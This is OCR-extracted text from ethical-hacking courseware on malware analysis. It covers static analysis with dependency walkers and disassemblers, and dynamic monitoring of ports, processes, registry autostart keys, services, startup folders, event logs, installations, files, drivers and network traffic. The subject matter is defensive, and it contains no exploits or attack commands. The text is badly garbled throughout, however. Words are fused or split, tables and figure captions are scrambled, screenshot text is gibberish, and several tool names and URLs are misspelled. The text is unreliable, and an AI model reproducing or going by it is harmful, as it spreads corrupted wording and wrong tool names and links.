analyze thesefiles,as theycan provide informationaboutmalwarei n a file. Filedependencies
includelinkedlibraries, functions,and functioncalls.Check the dynamically linkedlist i n the
malwareexecutablefile. Finding out all the library
functionsmay allowyou to guesswhatthe

Somestandardailsare listedi n thetablebelow:

the
malwareprogramcan do. You shouldknow various dll usedto loadandrun a program.

dll
Kernel32.dl
Corefunctionality,
suchas
of contents
Description
accessandmanipulation
of memory,
files,
andhardware
Providesaccess to advanced
c ore Windows suchas the
components
Advapi32.all
i ServiceManager andRegistry
User-interface
User32dll_—| components, suchas buttons,
scrollbars, and
componentsfor controlling
andrespondingto user actions
Gdi32.d!1
|
Functions displaying
for
andmanipulating graphics

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Neal. Interface
tothe
Windows
kernel

||
WSock32.dll
and Networking
DLLsthat help
to connect to a networkor perform
Ws2_32.dInetwork-related
tasks

|
Wininet.dll__ Supports
higher-level
networking
functions

You can use Dependency

tools suchas
dle Table
7 5: Standard

Walker to identify
the dependencies
within the
executable
=
file
Dependency
Walker
http://www.dependencywalker.com
Source:

Walker application
Dependency
calls.Furthermore,
listsall the dependent
tree diagrams.
hierarchical
modulesof an executablefile and builds
It alsorecordsall the functionsof eachmodule’s
it detectsmanycommon problems
exportsand
suchas missingand
invalid modules,import/export mismatches, circulardependency errors, mismatched
machinemodules, andmoduleinitializationfailures,

1 Wier
Dependency -ninormere]

Sag Buu :

Sects [tang
tetas

aie Fie
Te Sone Unk TeSa

7.73;Seeenshatof Depend
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 dependency
Someadditional extraction toolsare as follows
=
Dependency-check(https://jeremylong.github.io)
=
Snyk(https://snyk-io)
©
Hakiri(https://hakiri.io)
(https://retirejs.github.io)
Retire.js

ical andCountermensores
Mackin ©by E-Comel
Copyright
 StaticMalwareAnalysis:
MalwareDisassembly

de ana uf or
{©Dasari

aa ton
nstructons
codeand
thebinary theassembly
ADA.
Yoais
oer
Wwindows,
delet
Uno Mac 8Xhosted
debe
mt
Seve

(©at ode rte

to assembly
wate
Usetoalsuch DA hat can ever
language
themachine ea e
aca tenes
s ae

program
nd
Inspect
he lope recognise
This procesisperformed
potential
{ook such
thes
usingdebugang
(htn//wvmove. de)
a5 OlWObe

andTools
Disassembling Debugging

tpg
nind
Oe te
wb (tava era

Malware Disassembly
Thestatic analysis alsoincludesthe dismantling of a given executableinto binary
format to
studyi ts functionalities
andfeatures. Thisprocesshelps to identify
the languageusedfor
programmingthe malware, APlsthat reveal Its function, etc. Basedon the reconstructed
assembly code, you can inspectthe programlogic andrecognizeits threatpotential.This
process c an be performedusingdebuggingtoolssuchas IDAPro,andOllyDbg,
=
IDA
Source:https://www.hex-rays.com
IDAProis a multi-platform anddebugger
disassembler that exploresbinary programs,
for whichthe source codeis not alwaysavailableto create maps of their execution. It
showstheinstructions i n thesame wayas a processor
representation calledassembly language. executes
them,
i.e, i n a symbolic
Thus,i t is easyfor you to find harmfulor
malicious
processes.
Features:
©. Disassembler
a disassembler,
‘As IDAProexplores binary programs, for whichthe source codeis
not always to create mapsoftheirexecution.
available,
Debugger
debugger
‘The in IDAProis an interactive tool that complements the dissemblerto
performstatic analysis
i n one step.It bypasses the obfuscationprocess,whichhelps
the assembler to process thehostilecodein detail

ical andCountermensores
Mackin ©by E-Comel
Copyright
 7.74:Seeenshatf IDAPro
Figure
Someadditionaldebugging
toolsare as follows:
=
Ghirda(heeps://ahidra-sre.org)
=
(https://rada.re)
Radare2
=
(htep://www.ollydbg.de}
OllyDbg
(htep://www.windbg.ora)
WinDbg
(https://docs.microsoft.com)
ProcDump

Modal
07
Page
tical
Making
and
Countermenso
CopyrightÂ
by Comet
 MalwareAnalysis
Dynamic

Dynamiamass
ons oftwo stages:
tem Basairing
andHos Integrity
Monitoring

HostIntegrityMonitoring

nudesthefollowing
Hostintertymonitoring

seal ofthefe system ety, ©Winans

Mostoning
Netw/oass
Serves Tal Monitoring

gs
‘vert
Montoring
Monteine/mss atc

Malware Analysis
Dynamic
Dynamic malwareanalysis is the processof studying the behaviorof malwarebyrunning it i n a
monitoredenvironment.Thistypeof analysis requiresa safeenvironment, suchas virtual
machines andsandboxes, to deterthemalwarefromspreading. Theenvironment design should
includetools that can capture
feedback.Typically, virtualsystems of
everymovement the malwarei n detailandprovide
act as a basefor conductingsuchexperiments,
relevant

Dynamic analysisis performed to gather valuableinformationaboutmalwareactivity, including

filesandfolderscreated, portsandURIsaccessed, functions
andlibrariescalled, applications
andtools accessed, informationtransferred, settingsmodified, processesand services started
bythemalware, etc.
Youshoulddesign and set up the environment forperforming the dynamic analysis suchthat
the malwarecannot propagate to the production networkandthe testingsystem is capable of.
recoveringfroma previously set timeframe goeswrongduring
if case anything the test. To
achievethis,the investigator needsto dothe following:
systemBaselining
Baselining
system)
whenthe malwareanalysis
state afterexecuting
begins,
thesystemstate (taking
refersto the processof capturing
whichcan be compared
the malwarefile.Thiswill
a snapshot the
with the system's
help understand
to the changes
the
of
malwarehasmadeacross the system. Systembaseliningincludesrecording
detailsof
thefile system, openports,networkactivity,
registry, ete.

HostIntegrity
Monitoring
Hostintegritymonitoring
is the processof studyingthe changesthat havetakenplace
acrossa systemor machineafter a series of actions or incidents.It involvestaking

ical andCountermensores
Mackin ©by E-Comel
Copyright
snapshots ofthe system beforeandaftertheincidentor action usingthe same toolsand
analyzingthe changesto evaluatethe impact on the system
andits properties.
In malware analysis,
hostintegritymonitoring helpsto understandthe runtime behavior
of a malwarefile as well as its activities,propagationtechniques, URLsaccessed,
downloadsinitiated,etc
Hostintegrity
monitoring thefollowing:
includes
PortMonitoring
Monitoring
Process
Monitoring
Registry
WindowsServicesMonitoring
StartupPrograms
Monitoring.
Monitoring/Analysis
EventLogs
InstallationMonitoring
FilesandFoldersMonitoring
Device Drivers Monitoring

Traffic
Monitoring/Analysis
Network
DNSMonitoring/Resolution
API
Calls
Monitoring

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MalwareAnalysis:
Dynamic PortMonitoring
1a)Malwareprograms cortupt thesjstem andopensysteminput/output
portsto establshconnections
w ith emote
systems,networks,or servers to acomplish
varous malisous
tasks
|G. Use portmonitoring
establaned tools
to unknownsueh
and
to
sean for
anetstat TCPView
a sueplclouPaddresees
for suspcous ports andlook anyconnection

Port Monitoring
Malware programs corruptthe systemand open systeminput/output portsto establish
connectionswith remotesystems, or servers to accomplish
networks, various malicious
tasks.
Theseopen portscan alsoformbackdoorsfor other typesof harmfulmalwareand programs.
Openportsact as communication channels for malware.They open unusedportson the
machineto connect backto the malwarehandlers.Scanning
victim’s for suspiciousportswill
helpi n identifying
You can also determine
suchmalware.
whethermalwarei s tryingto accessa particular portduringdynamic
analysis
byinstallingportmonitoring toolssuchas TCPView andWindowscommand-line utility
toolssuchas netstat. Theseportmonitoring tools providedetailssuchas the protocolused,
localaddress, remote address,and state of the connection. Additionalfeaturesmay include
processname, process ID,remote connection protocol,etc.
=
Netstat
It displays
active TCPconnections, portson whichthe computer Is listening,
Ethernet
the IP routingtable,
statistics, IPv4 statistics (forthe IP,ICMP,TCP,and UDPprotocols},
and IPv6statistics(forthe IPv6,ICMPv6, TCPover IPv6,and UDPover IPv6protocols}.
‘When
usedwithout parameters, netstat displays onlyactive TCPconnections.
Syntax
netstat[-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
Parameters
©. -at Displays
all active TCP connections andthe TCP and UDP ports on whichthe
is listening.
‘computer

ical andCountermensores
Mackin ©by E-Comel
Copyright
 : DisplaysEthernetstatistics,suchas thenumberof bytes
and packets
sent and

sn: Displays
active
can
received.Thisparameter becombinedwith -s.
TCP connections;however,addressesand port numbers are
expressed
numerically,
andno attemptis madeto determinenames.
-0:Displays active TCPconnections and includesthe process ID (PID) for each
connection. Youcan findthe applicationbasedon the PIDi n the Processes tab i n
TaskManager.
‘Windows Thisparameter can becombined

-p Protocol:Showsconnections for the protocol

with -a, -n, and
specified
-p.
byProtocol.In this case,
Protocol can be tcp,udp,
tepv6, or udpv6.Ifthisparameter is usedwith-s to display
statisticsbyprotocol, Protocolc an be tcp,udp,imp, ip, tepv6, udpv6, icmpv6, or
ipve.
~s: Displays Bydefault,statisticsare
statisticsbyprotocol. shownfor the TCP, UDP,
ICMP, If the IPv6 protocol
and IP protocols. for WindowsXP is installed,statisticsare
shownfor the TCPover IPv6,UDPover IPv6,ICMPV6, and IPV6protocols. The -p
parametercan beusedto specify a set of protocols.

-r: Displays
command,
the contents of the IP routingtable.Thisis equivalent
to
the route print

In the image below,thecommandnetstat -an displays

all the active TCPconnections as,
well as the TCPand UDPportson whichthe computeris listening
along
with the
addresses andportnumbers.

Figure
7.7: Screenshot
of Netstat,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TcPview
Source:https://docs.
microsoft.com
TCPViewis a Windowsprogram that showsdetailed listings
of all TCPand UDP
endpoints including
on the system, the localandremote addresses,
andthe state ofthe
TCPconnections,It provides
a subsetof the Netstatprogram that ships
with Windows.
TheTCPViewdownloadincludes a command-line
Tepvcon, version with the same
functionality.
WhenTCPViewruns, it enumerates all active TCPand UDPendpoints,
all IP addresses
resolving to theirdomainnameversions.

Figure776:
Screenshot
ofTPÂ¥iew
Someadditionalportmonitoring
toolsare as follows:
+
PortMonitor (https://www.port-monitor.com)
+
CurrPorts (https://wwwnirsoft.net)
TCP (https://www.dotcom-monitor.com)
PortMonitoring
(http://www.
PortExpert kesoftwares.com)
NetworkMonitor (https://www,paessler.com)
PRTG

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MalwareAnalysis:
Dynamic ProcessMonitoring

tenulne
Windows
their
“a: themselves
Mabwareproramscamoutage Process
Monitor
enue Windows
series

Somemalware programsalo use

Enactablel
to ineetnto
or hide

PEs
proceses

(Portable
various processes veh
TheProcessM onitor
shows
rd proces/thread acy
—
thefil
realtime sate, Registry,

as or web browsers)
explorerexe
toolsikeProcessMonitor
Use process monitoring
Saibc eae ear RaSM
to sean forsupicious
processes,

Monitoring
Tools
Process
Process
ler hte //ecsmost com)

Borer
‘pom hp /ptemespoeenet)

ProcessMonitoring
Malwareenters the systemthrough images, music files,
videos,
etc., whichare downloaded
from the Internet,camouflage themselvesa s genuineWindowsservices, and hidetheir
processes to avoid detection.Somemalwaresuse PESto injectthemselvesinto various
processes(such a s explorer.exe
or web browsers).Maliciousprocesses are visiblebut appear
legitimate;
hence,
theycan bypass
desktop
firewalls.Attackersuse specific
rootkit methodsto
so that the antivirus softwarecannot detectit easily
hidemalwarei n the system
Process monitoring helps i n understanding the processesthatthemalwareinitiates andtakes
over after execution. It is also necessaryto observethe child processes,associated handles,
loadedlibraries, functions, and execution flow of boottime processes to definethe entire
nature of a file or program, gather informationabout the processes running before the
execution of the malware, and comparethemwith the processesrunningafter execution.This
methodwill reducethe time takento analyze
the processesthat the malwarestarts. Use process-monitoring
detectsuspicious processes.
andhelpi n easyidentification all
the processes
toolssuchas ProcessMonitor to of
+
Process Monitor
microsoft.com
Source:https://dacs
Process Monitor is a monitoring tool for Windows that showsreal-timefile system,
and process/thread
registry, activity.It combinesthe featuresof two legacy Sysinternals
utilities,
Filemon
and Regmon,
richandnon-destructive
and adds an extensive list of enhancements,
filtering,
comprehensive
user names, reliable processinformation,
event properties
including
suchsessionIDsand
full thread stackswith integrated symbol
supportfor eachoperation, simultaneouslogging to
a
file,and so on, The unique

ical andCountermensores
Mackin ©by E-Comel
Copyright
 featuresof ProcessMonitor makeit a core utilityin systemtroubleshooting
and
malwarehunting
toolkits
Feature:
© More datacaptured
foroperation
inputandoutputparameters.
filtersthat can be set without losing
Non-destructive data.
Capture makesit possible
of threadstacksfor eachoperation to identify
the cause of,
‘operation
i n manycases.

Reliable
capture including
of processdetails, imagepath,
command
line,user, and
session ID.
Configurable andmoveablecolumnsfor any event property.
Filterscan beset foranydatafield,includingfieldsnot configured
as columns.
Advancedlogging architecturescalesto tens of millionsof captured events and
gigabytes of logdata
Process tree toolshows therelationshipsofall processesreferencedi n a trace.

Native logformatpreservesall datafor loading in a differentProcess Monitor

instance.

27Process
Monitor.Syinternal:wo.sysinterale.com
Fle Edt Event Fiter Tools Options
Help
SE °BE/ FAG O HS RASH

SOFTWARE
ALANSeftrare
erent
Moosst
Window
Wows

Showing
183,571
of
36
696
events
($9) Backed
byvita memory

Screenshot
Figure 7.77: of ProcessMonitor

ical andCountermensores
Mackin ©by E-Comel
Copyright
Someadditional toolsare as follows:
monitoring
process
=
Process (https://docs.
Explorer microsoft.com)
*
(https://www.manageengine.com)
OpManager
+
Monit (https://mmonit.com)
(https://www.eset:com)
Sysinspector
ESET
Explorer
System (http//systemexplorer.net)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Continous
by
toring
entriesintotheeis
themaou programune automataly
‘hat
famteror dec bots
andensrng
the
whenever

Registry
Monitoring Tools

fe rare htns/vamchemtable
com

Registry
Monitoring
The Windowsregistrystores OSand program configuration details,suchas settingsand
options. storesits functionality.
If themalwareis a program,theregistry Themalware u sesthe
registryto performharmfulactivitycontinuouslybystoringentries in the registry
and ensuring
that themaliciousprogramruns whenever thecomputeror devicebootsautomatically.
Whenan attackerinstallsmalwareon the victim’s machine, it generates a registryentry.
Consequently,
various changes will be noticed, suchas the systembecomesslower, various
keep
advertisements poppingup,andso on.
Windowsautomatically sectionsof the registry:
executesinstructionsin the following
=
Run
=
RunServices
=
RunOnce
=
RunServicesOnce
=
HKEY_CLASSES_ROOT\exefile\shell\open\command
"%1"%*.
Malwareinserts instructions i n thesesections of the registry to perform maliciousactivities.
You shouldhavefairknowledge of the Windows its contents,andinner workings
registry, to
analyze the presenceof malware.Scanning for suspicious will helpto detectmalware.
registries
Useregistry monitoringtoolssuchas RegScanner to scan registryvaluesfor any suspicious
entries that mayindicatemalwareinfection.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 jv16PowerTools
Source:https://www.macecraft.com
Jv16PowerToolsis a PCsystem
and data,cleaning utility
software
the Windowsregistry,
that worksbyerasing unnecessaryfiles
automaticallyfixingsystemerrors, and
‘optimizing
It
your system.
i n detecting
helps registry
monitor Speedup
It allowsyou to scan and the registry.
entries createdbythe malware.The“Clean And
MyComputer― featureof Registry Cleanerin jv16PowerTools i s a solutionfor fixing
errors and system
registry errors and cleaning leftoversand unnecessaryfiles
registry
suchasold
log
files files.
andtemporary

Coday,
2 moment

Someadditional
registry
Figure7.78Screenshot
tools
monitoring are as
of
16 PowerTools
follows:
regshot(hetps://sourceforge.net)
(https://www.chemtable.com)
Reg Organizer
=
Viewer (https://accessdata.com)
Registry
(https://www.nirsoft.net)
RegScanner
Registrar
RegistryManager(https://www.resplendence.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
Malware
Dynamic Analysis:
Windows
ServicesMonitoring CEH

{©erploy
echaves
LOCAL
MACHINE
System)
Maware maya
ey ott to mano HEY curentantotetSercs

Manager
(Svan
{©UeeWindows eves mrtoringt0 ch 38 Windows
S ervice to aceaus sees nti

Monitoring
Tools ‘Windows
Service

into //ccuntyplode.com)

Netwreerie Montr(tps/Auwncnetarixcom)
‘virTsk (psa
Manager oniccom)
Series tp/wcactepicom)

WindowsServicesMonitoring
Attackersdesign malwareand other maliciouscode suchthat theyinstall and run on a
computer i n theformof services. Asmostservicesrun i n the background to supportprocesses
and applications, the maliciousservices are invisibleeven when theyare performing harmful
activities i n the system andtheycan functionwithout intervention or input.Malwarespawns
Windowsservices that allow attackersto remotely control the victim'smachineand pass
maliciousinstructions. Malwaremay alsoadopt rootkit techniques the following
to manipulate
registry keys to hidetheir processesandservices.
HKEY_LOCAL_MACHINE\System|CurrentControlset\Services
‘These
maliciousservices account or other privileged
run as a SYSTEM whichprovide
accounts,
greateraccess compared
to user accounts,making them more dangerousthan common
malwareand executablecode.Attackersalso try to concealtheir actions bynamingthe

to
maliciousserviceswithnamessimilar genuineWindowsservices avoiddetection.
fileduring
You can trace maliciousservices initiated bythe suspicious dynamic
analysis
using
to
Windowsservice monitoring tools suchas WindowsService Manager (SrvMan),
which can
detectchanges in services andscan for suspicious
Windowsservices.
*
WindowsServiceManager (SrvMan)
Source:http://tools.sysprogs.org
SrvMan hasboth GUI and command-line
modes.It can also be usedto run arbitrary
Win32applications
as services (when
sucha service is stopped, the main application
windowis automatically
closed).

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Youcan use SrvMan's to perform
interface
command-ine thefollowing
tasks:
Createservices
srvman.exeadd <file.exe/file.sys> [service name] [display nane]
[/type:<servicetype>] [/start:<start mode>][/interactive:no]
(/overwrite:yes]
Deleteservices
srvman.exe delete <service name>

Start/stop/restart services
srvman.exe start <service name> [/nowait] [/delay:<delay
in msec>]
srvman.exe stop <service name> [/nowait] [/delay:<delayin msec>]
srvman.exe restart <service name> [/delay:<delayin msec>]
Installandstart a legacydriverwith a single
call
srvman.exe run <driver.sys> [service name] [/copy:yes]
[/overwrite:no] [/stopafter:<msec>]

©
sere Manger

LE
Sree teed mee Sal nS riePerenitonet oer
Scr tery Moet Oe reservar)
Dresden eset

Neon
ACP Spleen
Syens@
Sense coe
Oren dire

een
‘Sin re Ei Sybex weno

AP
yontemnras) Aft hope Oe

Ateir
Sir Seed Pow

enna
Seams taeed 08s
itch. ee ete ae ave open bh Fee
Sirens leet sonen “ aren OPOORSS
Su0 seney rca cn Dina Veh

Cree)

Pose
NunaOws
we
Stenay

SomeadditionalWindows
service
Figure
779:Screenshot

monitoring
of Windows Manager
toolsare as follows:
Service
=
(https://securityxploded.com)
AdvancedWindowsServiceManager
(httpsi//processhacker.sourceforge.io)
Process Hacker
=
NetwrixService
‘AnVir
Monitor
(https://www.netwrix.com)
(https://www.anvir.com)
TaskManager
Services (https://www.activeplus.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Startup
Malware Analysis:
Dynamic Monitoring
Programs

©check

> windows
services
that
ae atomtialystred
GotoRun->Toeserves msc Sot Stu THPE

>

art
ciprosrmosa\wicosoWindow
mend\Proprams\strtop

Startup
Programs
Monitoring
Malware can alter the systemsettings to the startupmenu to perform
and add themselves
malliciousactivities whenever the systemstarts.Therefore,
scanningfor suspiciousstartup
programsmanually toolssuchasAutorunsfor Windowsis
or usingstartupprogrammonitoring
essentialfor detecting malware.
psto manually
Stey detecthiddenmalware:
‘=
Step1:Checkstartupprogramentries in the registry
Startupitems such as programs, shortcuts,
folders,
and drivers are set to run
automatically OS(e.g.,
at startupwhenusersloginto a Windows Windows
10).Startup
items can be added bythe programs or driversinstalled, or manuallybythe user.
Programs that run on Windows10 startupcan be located
i n theseregistry
entries,such
as Windows startupsetting,Explorer
startupsetting,andIEstartupsetting.
© WindowsStartup Setting
HKEY_LOCAL_NACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
KEY_CURRENT_USER\Sof
tware\Microsoft\Windo
HKEY_LOCAL,_NACHINE\S
crosoft\Windows\C
KEY_CURRENT_USER\Sof
tware\Microsoft\Windo
Explorer Setting
Startup
MACHINE\SOFTWARE\M
HKEY_LOCAL,_
r\shall Folders,crosoft\Windows\C
CommonStartup

HKEY_LOCAL,
r\Usar MACHINE\SOFTWARE\M
Shell crosoft\Windows\C
Folders, Conon Startup

ical andCountermensores
Mackin ©by E-Comel
Copyright
 tware\Microsoft\Windows\CurrentVersion\Explorer
KEY_CURRENT_USER\Sof
\sheli Folders, startup
HKEY_CURRENT_USER\Sof
tware\Microsoft\Windo
\User shell Folders, Startup
le Startup
Setting
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\URLSearchiiooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar
HKEY_LOCAL,_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Extensions
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\MenuExt
=
Step
2: Checkdevicedriversautomatically
loaded
Navigate \Windows\system32\drivers
to C: to checkthe devicedrivers.

Sews
Hee
Swe

Figure displaying
7.80:Screenshot vers folder

3: ini
Check
(bootmgr)
Step Checkboot.
(bootmgr)
entries
boot.inior bed
or bed
entries usingthe commandprompt.Open command
typebededit,
promptwith administrativeprivileges, and pressEnterto view all the boot
manager
entries.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Step
Figure
7.81; boot
info displaying
Screenshot
4: CheckWindowsservices that start automatically
Go to Run> Typeservices.mse and press Enter. Sort the services byStartup Type to
checkthe Windowsservices list for services that automatically start whenthe system
boots.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 782:Screenshoteisplaying
Figure services

‘=
Step5: Check
Startup
the
Startup
foldersstore applications
folder
or shortcutsto applications
that auto-start whenthe
systemboots. To checkthe Startup searchthe following
applications, locationsi n
Windows10:
© ¢:\ProgranData\Microsoft\Windows\Start
Menu\Programs\startup
© c:\Users\

Name)
\AppData
(User-

\Roaning\microsoft\Windows\StartMenu\Progras\startup
Anothermethodto
access startup foldersis as follows:
1. Press simultaneously
Windows+ R to openthe Runbox
2.
Type
shell: and
startup in
OK to
the
the
startup
box
folder
click to navigate

Fn Rivecmnpeninye
rex [i

Figure
783: shell:
command
Run
Screenshot
showing startup

ical Mackin
inthe box

andCountermensores ©by E-Comel

Copyright
Startup
Program
Monitoring
Tool: AutorunsforWindows
Source:https://docs.microsoft.com
Thisutilitycan auto-start the locationof any startupmonitor,display
what programs are
configured systembootup
to run during or login,
andshowthe entries i n the orderthat
Windowsprocessesthem.Oncethis program is includedi n the startupfolder,Run,RunOnce,
and other registrykeys, users can configureAutorunsto show otherlocations, including
explorershellextensions, toolbars,browserhelper objects,
Winlogon notifications,
and auto-
start
services.
Autoruns'HideSigned MicrosoftEntriesoptionhelps the user to zoom i n on third-party
auto-
and it provides
start imagesthat are addedto the user'ssystem, supportfor checking
the auto
start imagesconfigured forotheraccountson the system.

©Wlosutitin
Mowe
Manas
Pon
784:Screenshot
Figure ofAutoruns
forWindows
Someadditionalstartupprograms monitoring
toolsare as follows:
+
WinPatrol(http://www.winpatrol.com)
=
Autorun (https://www.chemtable.com)
Organizer
©
(https://www.glarysoft.com)
QuickStartup
Pro(http://www.outertech.com)
Startéd
Startup
Chameleon (http://www.chameleon-managers.com)
Manager

ical andCountermensores
Mackin ©by E-Comel
Copyright
 j
Malware Analysis:
Dynamic Monitoring/AnalysisC\EH
Event Logs

Log octvtes
(©

| |
aulyisis proceso anahing
computergenerstedrecordsor Splunk

Usetools
(©
the
to
oganalysis Splunk

(heeyArmnnogeriecont
(hes/wsotorinscem)

(tere com)

Event Logs
Monitoring/Analysis
Loganalysis
is a process that provides
the detailsof an activityor event that can extract
possible
attacksi n theformof Trojans worms
informationand helps
backdoor Trojans
i n identifying
or any possible
or
i n the system.
security
attacks(failed
It servesas
gaps.Thisprocesshelps
authentication/login
a primarysource of
i n detecting
attempts)
zero-day
whenlogs a re
analyzed for different components. Logmonitoring c an be performed for components that
perform security operations, suchas firewallsystems, IDS/IPS,web servers, andauthentication
servers. Thelogs also contain file types,ports,timestamps, and registry entries. In Windows,
system logs, application logs,
access logs,audit logs,
andsecurity logscan be analyzed i n Event
Viewerunderthesection“Windows Logs.―
Logsare locatedvia the following
paths:
system logs
Start > Windows
Administrative
Tools> EventViewer > WindowsLogs
System logs
Security
Tools> EventViewer> WindowsLogs
Start> WindowsAdministrative > Security

and
ApplicationsServicesLogs
Start> WindowsAdministrativeTools> EventViewer > Applications
andServices
Logs

ical andCountermensores
Mackin ©by E-Comel
Copyright
LogAnalysis
Tools:
=
Splunk
Source:https://www.splunk.com
Itis a n SIEMtool that can automatically
collectall the event logs
from all the systems
present in the network.Splunk
forwardersneedto beinstalledin all the systems i n the
networkthat needto be monitored,
andtheseforwarderswill transferthe real-time
logs
event to themain Splunk
fromthenetworksystems dashboard,

NewSearch

785:Screenshotof Splunk
Figure
Someadditionallogmonitoring/analysis
toolsare as follows:
=

=
ManageEngine
Logaly
EventLog
Analyzer
(https://www.manageengine.com)
(https://www-logaly.com)
SolarWinds (https://www-solarwinds.com)
Log& EventManager
Netwrix Event Log
Manager(https://www.netwrix.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MalwareAnalysis:
Dynamic InstallationMonitoring

{Whenthe system or wer installor uninstallny MielcasoftInstallMonitor

sd background
instalationsthatthemabware

Use tools
i nstalationmonitoring sch= Mirehusoft

Installation
Monitoring
Tools
Cervo Poa Manager tan comodo]

Installation Monitoring
Whenthe system any softwareapplication,
or user installsor uninstalls traces of the application
datamight remain on the system. To findthesetraces,youshouldknowthefolders modified
or
createdduring the installationprocessas well as the files and foldersthat have not been
modified bythe uninstallprocess.Installation monitoringhelps i n detecting
hiddenand
background installationsperformed bymalware.Toolssuchas SysAnalyzer can be used to
monitor the installationof malicious
executables.
Mirekusoft
InstallMonitor
Source:https://www.mirekusoft.com
MirekusoftInstallMonitor automaticallymonitors what is placedon your system and
It worksbymonitoring
allowsyou to uninstallit completely. as file and
resources (such
registry)
that are createdwhena programis installed.It providesdetailedinformation
aboutthe softwareinstalled.Furthermore,it helps
you to determinethe disk, CPU,and
memoryconsumption of yourprograms.It alsoprovides informationabouthowoften
you use different programs.
A programtree is a usefultool that can showyou which
programs were installedtogether.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Openin
ast

Sess
Gans ses
OSS)Conan
bee―
Regn:
Suretregate 0, 7a

Someadditional
installation
install
Monitor
7.86:Screnshot of Miekusof
Figure
toolsare as follows:
monitoring
=
(hetps://www.aldeid.com)
SysAnalyzer
=
AdvancedUninstallerPRO(https://www.advanceduninstaller.com)
=
REVO PRO(https://www.revouninstaller.com)
UNINSTALLER
ComodoPrograms (https://www.comodo.com)
Manager

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MalwareAnalysis:
Dynamic FilesandFoldersMonitoring

and
after
|@ Mawar programsnormally
modiysytem PAFile Sight
fles folders infecting «computer
“osnau whotsser teu orreing es
Shedetects ues copying sansoptonalyace sce

to
1 0 Use andoer egy chachrs h e PAL
Fle Sigh,
Tripwire, Netra
ond Autor
changesIn systemes and folders

Files andFoldersMonitoring
Malwarecan modify the system
filesandfoldersto save some informationi n them.Youshould
beableto findthefilesandfoldersthatthemalware creates andanalyzethemto collectany
relevantstoredinformation.Thesefilesandfoldersmayalsocontain hiddenprogramcodeor
maliciousstringsthat the malwarewould schedule for execution according
to a specified
schedule.
Scanfor suspiciousfilesand foldersusing tools suchas PAFile Sight,
Tripwire,
and Netwrix
Auditor,
to detectanyTrojans installeda swellas system
filemodifications.
=
PAFileSight
Source:https://www.poweradmin.com
PA File Sight and auditing
is a protection tool. It detectsransomware attackscoming
fromthenetworkandstopsthem.
Features:
Compromised are blockedfromreaching
computers fileson other protected
servers
on thenetwork
Detectsuserscopyingfilesandoptionally
blocksaccess
Real-time
alertsallowappropriate immediately
staffto investigate
Monitors who is deleting,
moving, or reading
files,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PAFile
SicHT
@-

—

checking
Someadditionalfile integrity
787; Screenshot
Figure
toolsare as
ofPA
File
Sight
follows:
‘=
Tripwire andChange
Fileintegrity (https://www.tripwire.com)
Manager
=

=
Netwrix
(https://www.netwrix.com)
Auditor
(https://www.ionx.co.uk)
Verisys
Checker(https://www.cspsecurity.com)
CSPFileIntegrity
NNT Change
Tracker(https://www-newnettechnologies.com)
 J
DeviceDrivers Monitoring CEH
MalwareAnalysis:
Dynamic
(2. Hatnare stale sngwth device dives DriverView

S
Ghtrengdawanenchesstwryraocance
> oman
Sftnare
ofthe
tslondadiss
cr desertion
| e.3]
‘Sytem
(© Gotonin m snfel2>
Type Enron
Gries ene orale ees

© river
ay
tern nee.

DeviceDrivers Monitoring
Malwareis installedon the systemalong with the devicedriverswhenthe user downloads
infecteddriversfromuntrustedsources. Themalwareuses thesedriversto avoiddetection
Onecan
to
scan for suspicious
device driversusing toolssuchas DriverViewandDriverDetective,
verifywhethertheyare genuine andwhethertheyhave beendownloaded
publisher's
original
site,
from the

Thepathto the locationof Windowssystem

driversis as follows:
Goto Run > Type msinfo32> SoftwareEnvironment> System Drivers

788:Screenshot
Figure displaying
Windows
ical
Drivers
System

andCountermensores
Mackin ©by E-Comel
Copyright
 Driverview
Source:https://www.nirsoft.net
TheDriverViewutilitydisplays
the list of all devicedriverscurrently
loaded i n the
i s displayed,
system.Foreachdriveri n the list,additionalinformation suchas load
of
addressthe driver,
Features:
description,
version, product
name, andmaker.

© Displays
thelistofall loadeddriversi n your system
©
Standalone
executable

©
Agievonoys 948
Apt
Vpn
scoot Diver
eran Netwok

©
O ne
Me

i
shea wore) Stem Appin Compa
Obs Kea Orne

@
Pere
i. orate

2
bette 1009 2009
sow. 5
cnr

ocussis on °

Screenshotof
Figure7.89: DverVew

Someadditional
devicedrivermonitoring
toolsare as follows
=
DriverBooster(https://www.iobit.com)
+
DriverReviver(https://www.reviversoft.com)
Driver (https://www.drivereasy.com)
Easy
Driver Fusion(https://treexy.com)
DriverGenius(http://www.
driver-soft.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 j
Dynamic
Malware Analysis: C/E
Network Traffic Monitoring/Analysis

(©programs
connect
bakto
hel
to
Malware
SolarWinds
NetFlow
handlers Traffic
Trafic
afi
tnd vendconfidentialAnalyzer
corelates
iformationatachers

network
scanners| the
va Anlye collects data, Riot
1@Use andpacket
snifers to monitor useable
formata n presensitto user na web-based
network
rafiegoing to maieou areas
remote networktrate
acefor monitoring

caning
tools
a8
(©Usenetwork such SolarWinds

Network
Ketiity
AnerTots
Campa
Network
Monitoring
(htpe/eclosoftcom)

PRTG
Network
Montor
Lancuard
Gr fps/vracom
hts paeslercom)

NetForANGuataanhtps//wwacnetfortcom)

NetworkTraffic Monitoring/Analysis
Networkanalysis
is the process of capturing it carefully
networktraffic and investigating to
identify
